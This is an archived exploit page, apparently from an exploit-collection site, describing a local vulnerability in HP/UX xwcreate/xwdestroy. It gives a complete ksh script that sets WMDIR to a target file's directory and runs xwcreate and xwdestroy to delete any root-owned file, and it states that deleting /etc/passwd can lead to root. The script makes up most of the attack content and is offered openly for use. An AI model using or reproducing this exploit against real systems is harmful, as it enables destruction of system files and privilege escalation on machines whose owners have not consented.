xwcreate/destroy vulnerability

Summary
Description:xwcreate and xwdestroy let you delete any file on system!
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise:delete any file on system, this can lead to root if you take out /etc/passwd, but BE CAREFUL! (local)
Vulnerable Systems:HP/UX with vulnerable xwcreate/xwdestroy 9.x and possibly 10.x
Date:Unknown
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/bin/ksh

# say Bye-Bye to any root owned file thanks to xwcreate/destroy

if [ -z "$1" ]
then
  echo "try: `basename $0` filename [display]"
  echo "WARNING: FILENAME PROBABLY WON'T BE THERE AFTER YOU DO THIS!"
  echo "Display is optional, but you do need an xhost/authed display for this."
  exit
fi

if [ -n "$2" ]
then
  DISPLAY=$2
  export DISPLAY
fi

WMDIR=`dirname $1`
FILE=`basename $1`
export WMDIR

echo 
echo "Before: ls -l $1 produces:"
ls -l $1

xwcreate $FILE
xwdestroy $FILE

echo 
echo "After: ls -l $1 produces:"
ls -l $1


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]